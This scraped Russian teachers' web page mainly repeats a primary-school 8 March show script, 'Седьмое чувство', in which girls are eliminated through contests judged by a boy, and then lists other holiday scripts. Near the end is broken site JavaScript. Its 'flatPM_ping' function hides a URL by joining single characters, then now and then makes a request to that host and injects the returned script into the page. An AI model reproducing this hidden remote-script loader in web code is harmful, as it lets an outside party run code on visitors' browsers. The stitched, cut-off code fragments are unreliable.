Сценарий к 8 марта для детей «Седьмое чувство»

Сценарий к 8 марта для детей «Седьмое чувство»

Ведущий: Мы рады приветствовать вас на нашей шоу-игре в канун весеннего праздника 8 марта — праздника внимания, нежности и любви ко всему женскому полу. Наш шуточный праздник «Седьмое чувство» посвящен прекрасным представительницам слабого пола. Встречайте!

( Выходят участницы. После этого идет представление каждой из участниц. Информация об участницах готовится заранее на основе опросника. Каждую девочку необходимо представить эффектно, для каждой найти интересную и необычную характеристику.)

Ведущий: Дорогие девочки! Сегодня мы ждем от вас только улыбок. Мы желаем вам победы, но, к сожалению, победительницей будет только одна из вас. Пожелаем вам достойно переносить поражение в игре. А сейчас настал момент представить нашего героя!

Встречайте. ! Он очень умен и любознателен. Любит свою семью. Сегодня он готов помочь девочкам-участницам пройти все испытания, дойти до финала единственной, о которой мы узнаем позже.

Седьмое чувство — особое чувство, оно не подвластно разуму, а лишь главному механизму организма — сердцу. Оно складывается из 5 слагаемых: осязания, обоняния, вкуса, слуха и зрения.

Мы начинаем игру с 1-го конкурса, который называется «Во всей красе».

Участницы должны продемонстрировать свои наряды, герой сделает тайный выбор и укажет на фотографию участницы, которую желал бы видеть в финале игры, а мы посмотрим, осуществится ли это.

( Девочки танцуют, ведущий дает краткую характеристику участницам. Когда танец закончится, герой переворачивает фото участницы, которую бы он хотел видеть в финале. Ее имя сразу не озвучивается. Если ей придется после какого-либо конкурса покинуть игру, герой один раз может спасти ее.)

2-й конкурс (вкус): «Любимое блюдо».

Все знают, что женщины любят ушами, ей всегда приятно слышать комплименты в свой адрес. А чем любят мужчины? Нам не раз приходилось слышать о том, что путь к сердцу мужчины лежит через желудок. Герою необходимо попробовать все блюда участниц и прокомментировать, что понравилось, а что нет. Участница, блюдо которой не понравилось нашему герою выбывает из игры.

3-й конкурс (осязание): «Сувенир».

С завязанными глазами герой отбирает себе предметы, которые ему приготовили участницы в подарок, комментирует, что он оставит, а что нет. Выбывает одна из девочек.

4-й конкурс (слух): «Талисман».

У нашего героя есть для девочек подарок — очень дорогой для него предмет. Однако, сегодня он может расстаться с ним для того, чтобы подарить его той участнице, которая первой отгадает, что же это такое. Герой может говорить только «ДА» либо «НЕТ».

( Девочкам дается возможность по очереди спрашивать, например, «Его носят на руке?», «На шее?», «Это игрушка?» и др. до тех пор, пока они не отгадают. Герой отдает этот предмет участнице, угадавшей, что это. Этот предмет-талисман может выручить девочку один раз.)

5-й конкурс (зрение): «Узнай меня по почерку».

Говорят, почерк передается каждому человеку по наследству, и как бы мы не старались его изменить, в будущем все равно он не сильно изменится. Почерк может рассказать почти все о своем хозяине: какой характер, темперамент, ум и др. Сейчас наш герой должен будет рассказать нам, по почерку девочки в тетради, что он чувствует. Какой почерк чем-то не понравился и почему.
( Выбывают еще 2 девочки.)

6-й конкурс (слух): «Услышь меня»

Наши участницы хотят прочитать для героя стихи, которые сочинили самостоятельно. Начало одинаковое:
Наш. (имя) стричься не желает, . (имя) с кресла уползает.

( Девочки зачитывают свои стихи. 2 участницы выбывают.)

7-й конкурс (обоняние): «Духи»

Каждая девочка преподносит для героя свой платочек, который не только красиво выглядит, но еще и пахнет. Герой отбери те, которые лучше всего, по его мнению, пахнут. Выбывают еще две участницы. К 8-му конкурсу остаются 2 или 3 девочки.

8-й конкурс «Статуя»

Герой стоит с завязанными глазами. У него на глазах 2 или 3 повязки — по количеству дошедших до финала участниц. Девочки по очереди должны подойти к нему, взять за руку и попытаются создать в паре красивую фигуру. Действиями руководит девочка. Герой называет номер участницы, которая по его мнению выиграла. Повязки снимаются.

Ведущий: Неважно, как сложится в дальнейшем судьба этой пары, но у них сейчас есть ощущение победы, подаренное им седьмым чувством!

Сценарий праздника к 8 марта для учащихся начальных классов «Седьмое чувство»

Авдокушина Светлана
Сценарий праздника к 8 марта для учащихся начальных классов «Седьмое чувство»

Сценарий к 8 марта для детей «Седьмое чувство»

Шоу-игра «Седьмое чувство» для учащихся начальных классов, позволит создать праздничное настроение и поможет участницам проявить себя в различных конкурсах.

Ведущий: Мы рады приветствовать вас на нашей шоу-игре в канун весеннего праздника 8 марта — праздника внимания, нежности и любви ко всему женскому полу. Наш шуточный праздник «Седьмое чувство» посвящен прекрасным представительницам слабого пола. Встречайте!

(Выходят участницы. После этого идет представление каждой из участниц. Информация об участницах готовится заранее на основе опросника. Каждую девочку необходимо представить эффектно, для каждой найти интересную и необычную характеристику.)

Ведущий: Дорогие девочки! Сегодня мы ждем от вас только улыбок. Мы желаем вам победы, но, к сожалению, победительницей будет только одна из вас. Пожелаем вам достойно переносить поражение в игре. А сейчас настал момент представить нашего героя!

Встречайте. Он очень умен и любознателен. Любит свою семью. Сегодня он готов помочь девочкам-участницам пройти все испытания, дойти до финала единственной, о которой мы узнаем позже.

Седьмое чувство — особое чувство, оно не подвластно разуму, а лишь главному механизму организма — сердцу. Оно складывается из 5 слагаемых: осязания, обоняния, вкуса, слуха и зрения.

Мы начинаем игру с 1-го конкурса, который называется «Во всей красе».

Участницы должны продемонстрировать свои наряды, герой сделает тайный выбор и укажет на фотографию участницы, которую желал бы видеть в финале игры, а мы посмотрим, осуществится ли это.

(Девочки танцуют, ведущий дает краткую характеристику участницам. Когда танец закончится, герой переворачивает фото участницы, которую бы он хотел видеть в финале. Ее имя сразу не озвучивается. Если ей придется после какого-либо конкурса покинуть игру, герой один раз может спасти ее.)

2-й конкурс (вкус): «Любимое блюдо».

Все знают, что женщины любят ушами, ей всегда приятно слышать комплименты в свой адрес. А чем любят мужчины? Нам не раз приходилось слышать о том, что путь к сердцу мужчины лежит через желудок. Герою необходимо попробовать все блюда участниц и прокомментировать, что понравилось, а что нет. Участница, блюдо которой не понравилось нашему герою выбывает из игры.

3-й конкурс (осязание): «Сувенир».

С завязанными глазами герой отбирает себе предметы, которые ему приготовили участницы в подарок, комментирует, что он оставит, а что нет. Выбывает одна из девочек.

У нашего героя есть для девочек подарок — очень дорогой для него предмет. Однако, сегодня он может расстаться с ним для того, чтобы подарить его той участнице, которая первой отгадает, что же это такое. Герой может говорить только «ДА» либо «НЕТ».

(Девочкам дается возможность по очереди спрашивать, например, «Его носят на руке?», «На шее?», «Это игрушка?» и др. до тех пор, пока они не отгадают. Герой отдает этот предмет участнице, угадавшей, что это. Этот предмет-талисман может выручить девочку один раз.)

5-й конкурс (зрение): «Узнай меня по почерку».

Говорят, почерк передается каждому человеку по наследству, и как бы мы не старались его изменить, в будущем все равно он не сильно изменится. Почерк может рассказать почти все о своем хозяине: какой характер, темперамент, ум и др. Сейчас наш герой должен будет рассказать нам, по почерку девочки в тетради, что он чувствует. Какой почерк чем-то не понравился и почему.

(Выбывают еще 2 девочки.)

6-й конкурс (слух): «Услышь меня»

Наши участницы хотят прочитать для героя стихи, которые сочинили самостоятельно. Начало одинаковое:

Наш. (имя) стричься не желает,. (имя) с кресла уползает.

(Девочки зачитывают свои стихи. 2 участницы выбывают.)

7-й конкурс (обоняние): «Духи»

Каждая девочка преподносит для героя свой платочек, который не только красиво выглядит, но еще и пахнет. Герой отбери те, которые лучше всего, по его мнению, пахнут. Выбывают еще две участницы. К 8-му конкурсу остаются 2 или 3 девочки.

8-й конкурс «Статуя»

Герой стоит с завязанными глазами. У него на глазах 2 или 3 повязки — по количеству дошедших до финала участниц. Девочки по очереди должны подойти к нему, взять за руку и попытаются создать в паре красивую фигуру. Действиями руководит девочка. Герой называет номер участницы, которая по его мнению выиграла. Повязки снимаются.

Ведущий: Неважно, как сложится в дальнейшем судьба этой пары, но у них сейчас есть ощущение победы, подаренное им седьмым чувством!

Классный час для учащихся начальных классов на тему «Добро и зло» Классный час на тему: «Добро и зло» Цель: 1. Осознание детьми понятий добра и зла 2. Формирование у детей чувства доброты 3. Формирование.

Классный час для учащихся начальных классов «Жить — с книгою дружить» МБОУ – СОШ №1 им. Октябрьской революции г. Севска Учитель начальных классов: Маннанова Лариса Михайловна Классный час. Тема: «Жить – с книгою.

Музыкальная сказка «Дюймовочка» для учащихся начальных классов по мотивам сказки Г. Х. Андерсена Играют дети (9-10 лет) Ведущие: мальчик и две девочки Тётушка Дюймовочка Жаба Сын Жабы Ласточка Жук Рок- группа из жуков (3-4 чел.) Мышь.

Сценарий праздника для учащихся 5-х классов «День защитника Отечества» Ведущ. 1 Добрый день наши уважаемые друзья! Ведущ. 2 Здравствуйте наши будущие защитники Родины! Ведущ. 1 Сегодня мы будем проверять вас на.

Сценарий праздника для начальных классов «Праздник Пасхи» Сценарий праздника для начальных классов. Праздник Пасхи Цель: Обобщение (уточнение) знаний школьников о традициях русской Пасхи. Задачи:.

Интеллектуальная шоу-игра ”Cедьмое чувство”

Сценарий интеллектуальной шоу-игры “Седьмое чувство”.

Внеклассное мероприятие для учащихся начальной школы. Проводится к празднику “День Святого Валентина” или к 8 марта.

Цель: создать праздничное настроение у детей, способствовать преодолению барьеров в общении между мальчиками и девочками в классе, помочь детям лучше узнать друг друга и укреплять дружбу между всеми учениками, воспитывать чувство прекрасного в отношениях между людьми.

Ход мероприятия

— Мы рады видеть вас на нашей шоу-игре “Седьмое чувство”. Наша игра проводится в канун замечательного весеннего праздника. 8 марта — праздник любви и внимания ко всему женскому полу, начиная от маленьких девочек до преклонного возраста старушек. Этот день давно превратился в нашей стране в веселый шуточный весенний праздник. А наш шуточный праздник мы назвали “Седьмое чувство” и посвящаем его нашим прелестным представительницам слабого пола 2 “а” класса. Встречайте.

Очень талантлива, прекрасно рисует и выполняет эксклюзивные работы. В ее арсенале достижений уже имеется авторская выставка, которая вызвала глубокий интерес у ее одноклассников. И никто не завидует, потому что Кристина готова отложить свое любимое дело и всем помочь. Много любимых предметов: труд, изо, православная культура, русский язык. Любит прятки. Нетороплива. Обладает очаровательной улыбкой.

В своем развитии очень тянется к старшим, стремясь обогнать свой возраст. Любимые предметы: чтение, труд, музыка, изо, физкультура. Прекрасно танцует, легко ладит со всеми одноклассниками. Хорошо воспитана, знает, что можно и что нельзя. Очень послушная, обязательная, ответственная. Ее девиз: если надо — значит, надо! Мечтает стать учителем.

От Близнецов ей досталась некоторая раздвоенность. Отсюда она так застенчива и безумно скромна. Талантлива, прекрасно рисует. Обладает самым высоким ростом из всех девочек и прекрасной внешностью, что позволяет ей мечтать о профессии художника-модельера и модельном бизнесе. Прекрасно ладит со всеми одноклассниками. Любит играть на свежем воздухе, купаться в море, кататься на велосипеде и смотреть книги. Обожает животных.

Аленка, Аленушка. Нежная, милая, хрупкая, ласковая и ранимая. На первый взгляд покажется, что нет характера, но это по мелочам, а в серьезных вопросах способна отстоять свою точку зрения и принять самостоятельное решение. Рассудительная. В семье и в школе первая помощница и хозяюшка. Мягкая и добрая девочка, готова всем помочь. Верит во все, что говорят ей взрослые. Любит чтение, настольные игры, суп, борщ. Мечтает стать учительницей или актрисой, потому что любит детей и внимание.

Способна добиться успеха во всем, особенно в математике. Любое дело доводит до конца, чем очень отличается от своих одноклассниц. Обладает эстетическим вкусом, любит своих родителей, море, комфорт, искусство. Коллекционирует наклейки. Романтическая и очень чувствительная. К выбору подружек подходит очень избирательно.

Яночка, Януля. Очень любит ласку, хотя этого не показывает. По гороскопу — Близнец. Гороскоп говорит, что Близнецы совершенно не способны воспринимать критику и очень обижаются, если им на это намекают. Увы. Наша Яночка от этого тоже очень страдает. Любит читать сказки про Золушку и Маленького принца. Мечтательная. Делает первые шаги в сочинительстве. Награждена грамотой МУК за цикл стихов в номинации “Поэзия”. Имеет шикарные волосы, высочайшая аккуратистка.

По гороскопу — Лев. Но у нее далеко не львиный характер. Ее чувства всегда остаются спокойными. Очень привлекательна, добра, всех успокоит и поддержит. Вот почему у нее так много друзей в классе! Много любимых школьных предметов — труд, чтение, математика, русский язык, изо, музыка. Талантлива, прекрасно рисует. Мечтает стать поваром. Кумиры — Дима Билан и Анастасия Заворотнюк.

Натура сложная и противоречивая — об этом говорит гороскоп. Но пока Катенька очень приятная, талантливая и рисковая девочка. Энергичная, жизнерадостная и смелая. Тянется ко всему, исследуя активно мир вокруг себя. Любит решать задачи, с интересом поглощает книги, принимает самостоятельные решения, очень артистична, обожает сцену, обладает режиссерскими способностями. Не любит прививки и молочные блюда.

Милая, ласковая, общительная, но далеко не простая девочка. Ее легко ранимая душа требует постоянной любви, ей ежечасно нужно демонстрировать свою любовь, подбадривать на действия. Целеустремленная и талантливая, не по годам эрудированная, стремится только к победе, но излишняя торопливость, а иногда и неаккуратность, бывает, подводят ее. Отличница. Готова всем помочь.

Жизнерадостна, правдива, полна надежд и легко раскрывается в общении. Все предметы даются ей одинаково легко, но трудолюбие и прилежание играют далеко не последнюю роль в ее учебе. Отличница. Пользуется особой любовью всех одноклассников.

Ведущий (после появления участниц):

— Не следует забывать о том, что это всего лишь игра, а игре не стоит придавать серьезного значения.

Дорогие девочки! Мы ждем от вас милых улыбок, красивых манер. Пожелаем вам с достоинством и мужеством переносить поражение и выбытие из игры. Помните, наш девиз — “Главное не победа, главное — участие”.

С правилами игры вы будете знакомиться в процессе самой игры. Они не сложные и должны принести вам истинное удовольствие.

А сейчас настал момент представить вам нашего героя!

Ему 8 лет, он выиграл кастинг на участие в нашей игре. 7 из 10 представительниц слабого пола 2 “а” класса отдали за него свои голоса. Он умен и любознателен. Обожает свою семью, бабушку, тетю Элю, влюблен в царицу наук — математику и сегодня готов помочь всем девочкам пройти все испытания и дойти до финала той единственной, о которой мы узнаем чуть позже.

Дорогие девочки! Вам предстоит пройти ряд необычных и веселых конкурсов, темой каждого из которых является одно из шести известных чувств: зрение, слух, осязание, обоняние, вкус и интуиция.

Как известно, седьмое чувство — это особое чувство, оно не подвластно уму и разуму, а только ему, главному механизму нашего организма, — сердцу. Седьмое чувство складывается из 6 слагаемых: зрения, слуха, вкуса, обоняния, осязания и интуиции.

Мы начинаем нашу игру с конкурса “Во всей красе”.

Наши участницы продемонстрируют свои наряды, а наш герой сделает свой тайный выбор, он укажет на фотографию той участницы, которую он хотел бы видеть в финале нашей игры, мы посмотрим, насколько это осуществимо.

(Девочки танцуют в красивом танце, а ведущий дает краткую характеристику каждой из участниц. Герой в конце танца переворачивает фото или карточку той участницы, которую он хотел бы видеть в финале. Имя этой девочки сразу не обнародуется, но если случится так, что ей придется после какого-то конкурса покинуть игру, то один раз ей будет позволено остаться в игре, а наш герой вручит ей тотемный подарок (талисман). Но он спасет ее лишь один только раз!)

Вкус. Конкурс “Любимое блюдо”

— Всем известно, что женщина любит ушами, ей более всего приятно слышать от любого мужчины комплименты в свой адрес. Она с удовольствием верит льстивым речам, хотя порой их и не заслуживает.

А чем любит мужчина, как ты думаешь, Женя? Приходилось ли тебе слышать такую фразу “Путь к сердцу мужчины лежит через. ” Вот тебе и придется отобрать те блюда, которые тебе по вкусу, и прокомментировать, чем тебе понравилось или не понравилось то или иное блюдо (блюда под номерами). Выбывает та из участниц, блюдо которой пришлось не по вкусу нашему герою.

Осязание. Конкурс “Сувенир”

С завязанными глазами наш герой отбирает себе те предметы, которые ему приготовили девочки в подарок и комментирует, что он оставит себе, а что нет. Выбывает одна из участниц.

Интуиция. Конкурс “Талисман”

— У нашего маленького героя есть для вас, девочки, подарок. Это очень дорогой для него предмет, но сегодня он готов расстаться с ним и подарить той участнице, которая первая отгадает и назовет его.

Евгений, вы говорите только “да” или “нет”

(Девочки по очереди спрашивают: “Его носят на шее? На руке?”, “Это игрушка?”, “Это. “, и т. д., пока не догадаются. Отдает участнице, которая первая догадалась. Потом этот талисман тоже выручит ее в игре.)

Зрение. “Узнай меня по почерку”

— Говорят, что почерк передается человеку по наследству вместе с генами, и как бы он ни старался его изменить, все равно в будущем он будет таким, каким задумала его природа.

Почерк может рассказать о своем хозяине почти все: каков характер, ум, темперамент, добрый или нет и т. д. Вот и расскажи нам, глядя в тетрадь девочки, что ты чувствуешь, какой почерк тебе чем-то не понравился?

Слух. “Услышь меня”

— А сейчас наши участницы готовы прочитать для нашего героя стихи собственного сочинения.

Начало у всех одинаковое:

Наш Женя стричься не желает,
Евгений с кресла уползает.

Можно прочитать стихи на тему “Седьмое чувство”

Седьмое чувство отыскать
Нельзя внутри сознания.
Не в силах здесь наука стать
Источником познания.

Нет в мире датчика того,
Который чувство знает;
Лишь сердце чувствует его,
Лишь сердце ощущает.

Обычно спит в душе оно,
Но иногда взрывается,
Дурманит, будто бы вино,
А сердце наслаждается.

Порою счастье принесёт,
Отнимет, дарит вновь;
Седьмое чувство в нас живёт,
Зовут его любовь!

— Женя, а как ты относишься к духам? Ты тонко чувствуешь запахи или для тебя все запахи одинаковы? Сейчас каждая девочка преподнесет для тебя свой платочек. Он не только красив, но еще и пахнет каждый по-своему. Вот и отбери тот, который тебе по нраву.

“Статуя” (остаются две участницы)

— У вас есть герой и цветы. Вот и создайте статую. А ты посмотри на них сквозь призму ароматов и ощущений. А я сниму с тебя 2 повязки, которые отделяют тебя от наших участниц, прежде чем ты назовешь, какая статуя заставила дрогнуть твое сердце.

Герой называет номер участницы, которую он выбирает.

— Аплодисменты! Неважно, как сложатся в дальнейшем отношения этой пары, но в них есть сейчас ощущение победы, которое подарило им седьмое чувство.

Играйте в нашу игру! Откройте в себе седьмое чувство!

Друзья, спасибо за вниманье!
Улыбок было здесь не счесть.
Настало время расставанья.
Прощайте все, до новых встреч!

Составила учитель начальных классов МОУ СОШ №28 Гончарова Н. Н. Ст. Тамань Краснодарский край.

Сценарии 8 Марта

Пусть будет этот День Весны
Для Вас особенно чудесным
И полным ясной глубины
И пряных запахов древесных.
Пусть алый цвет и бирюза
Рождают праздничность и песни,
Пусть будут яркими глаза,
И будут радостными вести.

Предлагаем педагогам помощь в аттестации. Размещаем творческий материал в официальном всероссийском сетевом журнале “Дошкольник.рф”. Журнал выходит 1 числа каждого месяца и имеет вид .pdf формата. Выдаются документы о публикации. Рассылается всем авторам номера и его можно скачать с главной страницы сайта. Имеет лицензию СМИ и зарегистрирован в Роскомнадзоре (ЭЛ №ФС77-55754). Для публикации в журнале и получения Сертификата публикации Вам нужно: прислать свой материал по адресу: doshkolnik@list.ru

Мы соцсетях – вступайте в группы – будем рады видеть Вас в наших рядах!

Сценарий праздника к 8 Марта «А ну-ка мамочки»
Сценарии 8 Марта
Автор: Алтухова Валентина Николаевна
11.03.2019 16:55

Сценарий праздника к 8 Марта «А ну-ка мамочки»

Цель мероприятия: воспитывать у детей доброе, внимательное отношение к маме, стремление ей помогать, радовать; развивать эмоциональные и духовные связи между детьми, педагогами и родителями.

Оборудование: кубики; воздушные шары; 2 кастрюли, игрушечные овощи и настоящие овощи (капуста, картошка, морковь, свекла, лук), терка, разделочная доска, нож;

Ведущий: Добрый день, дорогие мамы и бабушки, здравствуйте, милые женщины! Поздравляем вас с Международным женским днем — 8 Марта. Мы с ребятами очень хотим, чтобы сегодняшняя встреча доставила вам радость; чтобы вы почувствовали, как любят вас дети, как дорого им ваше внимание.

Ведущий: Мы начинаем наше весеннее спортивное мероприятие для мам “А ну-ка, мамочки!” и приглашаем на соревнование 2 команды: команда девочек — «Дюймовочки» и команда мам — Мы устроим вам несколько испытаний, они совсем несложные.

Информационно-творческий проект «Праздник мам» с детьми старшей группы
Сценарии 8 Марта
Автор: Абрамова Мария Николаевна
20.02.2019 21:19

Информационно-творческий проект «Праздник мам» с детьми старшей группы

Автор проекта: воспитатель Абрамова М.Н. 2019 год Муниципальное дошкольное образовательное учреждение детский сад №98 г. Чита МБДОУ №98 г. Читы

Мини проект на тему: «Праздник мам».

Проектная деятельность на тему: «Праздник мам» с детьми старшей группы.

Тип: краткосрочный (с 26. 02-7. 03)

Участники: Дети старшей группы, воспитатели, музыкальный руководитель, родители.

Цель: закрепить и расширить знания детей о празднике 8 Марта.

Подробнее.
Развлечение для детей дошкольного возраста «Моя мамочка – самая любимая. »

Развлечение для детей дошкольного возраста «Моя мамочка – самая любимая. »

Авторы:

  • Климова Ольга Юрьевна, воспитатель высшей квалификационной категории
  • Иванова Галина Александровна, воспитатель первой квалификационной категории

ГБОУ города Москвы “Школа № 402 имени Алии Молдагуловой”, ДО “Семицветик”

Под музыку дети входят в музыкальный зал под песню «Мамочка»!

Цели:

  • создание благоприятных условий для развития нравственного, коммуникативного и творческого потенциалов,
  • воспитание любви и уважения к матери, бабушке чувство благодарности за их заботу и любовь
  • развивать выразительность речи, артистизм
  • содействовать сплочению коллектива детей и взрослых.
Сценарии 8 Марта
Автор: Климова Ольга Юрьевна Иванова Галина Александровна
20.02.2019 17:24
Подробнее.
Частушки для сценария 8 марта

Ставьте ушки на макушке,
Слушайте внимательно.
Развеселые частушки
Споем вам обязательно!

Дорогие наши мамы,
Мы частушки вам споем.
Поздравляем с 8 Марта
И привет горячий шлем.

В женский день 8 Марта
Папа сам варил обед,
И, скажу вам по секрету,
Натворил немало бед.

Подгорели суп и каша,
соль насыпал он в компот,
Как вернулась мама наша,
Много было ей хлопот.

Сценарии 8 Марта
Автор: Главный Редактор
16.02.2019 17:27
Подробнее.
Внеклассное мероприятие для учащихся начальной школы накануне праздника 14 февраля или 8 марта

Нина Гончарова
СВИДАНИЕ ВСЛЕПУЮ
интеллектуальная шоу-игра, прообраз телепередачи
Я учу детей 4 года и раз в год провожу игру на эту щекотливую тему, но не дублирую:
1-й класс – «Да здравствует дружба!»
2-й класс – «Седьмое чувство»
3-й класс – «Любовь с первого взгляда»
4-й класс – «Свидание вслепую»

Сценарии 8 Марта
Автор: Гончарова Нина Николаевна
27.01.2019 14:27
Подробнее.
“Мисс интеллект” – 8 марта сценарий
Сценарии 8 Марта
Автор: Редактор
27.01.2019 12:32

Выход в вечерних платьях
Под медленную музыку появляются участницы, делают проходку по залу, останавливаются на лестнице, во время движения по залу, ведущий зачитывает «Отзыв о себе» – каждая участница пишет для себя – «Я – это я»
Конкурс «Я бы поступила так…»
Примеры женской логики. Зачитываются ситуации – девушки произносят выход из этой ситуации.
Конкурс со зрителями «Принцесса на горошине»

Подробнее.
Детско-родительское развлечение в средней группе «Мама – солнышко моё»

Детско-родительское развлечение в средней группе «Мама – солнышко моё»

Цель:

  • Воспитание коммуникативных, социально-нравственных качеств у детей.
  • Установление дружеских отношений между родителями и детьми группы, развитие творческого сотрудничества.
  • Создание доброжелательной атмосферы эмоционального общения посредством включения детей и родителей в совместную деятельность.
  • Формирование у детей артистических навыков через использование речевых средств выразительности.
  • Создать праздничное настроение у детей и мам.

Предварительная работа:

  1. Беседы о маме, составление рассказов из личного опыта.
  2. Заучивание стихотворений и песен к развлечению.
  3. Подбор литературного материала.

Ход мероприятия: Групповая комната празднично украшена. Дети под музыку заходят в группу, садятся на стульчики.

Сценарии 8 Марта
Автор: Чайка Алевтина Васильевна
23.01.2019 00:05
Подробнее.
Сценарий праздника «Мама-шоу»

Сценарий праздника «Мама-шоу»

Дети заводят мам в зал, садят на стульчики и становятся в полукруг.

1 реб. Запахло мартом и весною,
Но крепко держится зима.
Число 8 не простое,
Приходит праздник К нам в дома.

2 реб. Желтеют южные мимозы,
В прозрачной вазе на столе
И Дед Мороз рисует розы,
Для милой мамы на стекле.

Сценарии 8 Марта
Автор: Макаревич Инна Сергеевна
22.01.2019 09:49
Подробнее.
Сценарий праздника 8 Марта «Кикимора и Шапокляк в гостях у детей детского сада»

Сценарий праздника 8 Марта «Кикимора и Шапокляк в гостях у детей детского сада»

Цель:

  • воспитать у детей чувства любви и уважения к маме, бабушке; привлечь внимание детей к празднику 8 марта, развивать у них интерес к традициям его празднования.

Задачи:

  • развивать память, артистичность
  • разнообразить досуг детей и родителей присутствием Шапокляк и Кикиморы:
  • сплотить коллектив детей, родителей и воспитателей.

Предварительная работа:

  • разучивание песен: «Ты не бойся мама», «У каждого, у есть мамочка своя», «Дети все на свете называют мамою»; танца «С ленточками»; хоровода «Приход весны»; изготовление подарков для мам и бабушек — цветы каллы из ватных дисков на шпажках.

Ход мероприятия:

Сценарии 8 Марта
Автор: Кузьмина Наталья Васильевна
16.01.2019 16:14
Подробнее.
Сценарий концерта к 8 марта в подготовительной группе «Дороже нет тебя на свет!»

Сценарий концерта к 8 марта в подготовительной группе «Дороже нет тебя на свет!»

Цель: создать у ребенка и родителей радостное настроение, вызвать эмоциональный подъем.

Выходят дети и садятся на стульчики по обе стороны от родителей.

В зал выходят ведущие — Диана и Семен.

Д: Здравствуйте, Уважаемые гости!

Д: Сегодня мы с вами собрались. Собрались. (поворачивается к Семену и тихо говорит). Семен, я забыла, для чего мы сегодня собрались.

С: Как, для чего! Смотри, сколько мам сидит в зале! Вон моя мама (машет маме) Мам, привет!

Д: А вон и моя мама! (машет) Привет, мама! Я вспомнила! Скоро же праздник, 8 марта! И сегодня ребята приготовили для мам и бабушек праздничный концерт. Встречайте наших артистов!

Выходят дети, становятся врассыпную. Звучит песня “Мама”.

Сценарии 8 Марта
Автор: Головко Елена Николаевна
04.01.2019 07:19
Подробнее.
КОНСПЕКТ НОД «Музыкальные конфеты для Бабушек и Мам» для детей старшей группы компенсирующей направленности

КОНСПЕКТ НОД «Музыкальные конфеты для Бабушек и Мам» для детей старшей группы компенсирующей направленности

ОО «Художественно-эстетическое развитие» /Музыкальная деятельность/

Музыкальный руководитель МБДОУ ДСКВ №34 г. Ейск О.А. Лукашенко

Программные задачи:

  • Актуализировать знания детей дошкольного возраста о международном дне 8 марта;
  • Развивать инициативность и творчество у детей дошкольного возраста;
  • Развивать коммуникативные навыки детей, умение находить выход из проблемных ситуаций;
  • Способствовать формированию умения быть заботливыми, нежными, ласковыми по отношению к близким;
  • Создавать теплый нравственный климат между мамами, бабушками и детьми;
  • Воспитывать доброжелательное общение детей в играх, продуктивной совместной деятельности между сверстниками и взрослыми;

Методы и приемы: словесные: беседа, прочтение стихотворений, вопросы к детям; наглядные: просмотр слайдов «Мама жизнь подарила»; практические: самостоятельная деятельность детей по выполнению музыкально-ритмических движений.

Ссылка на основную публикацию
Adblock
detector
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Сценарии 8 Марта
Автор: Лукашенко Ольга Александровна
24.12.2018 17:06
Яндекс.Метрика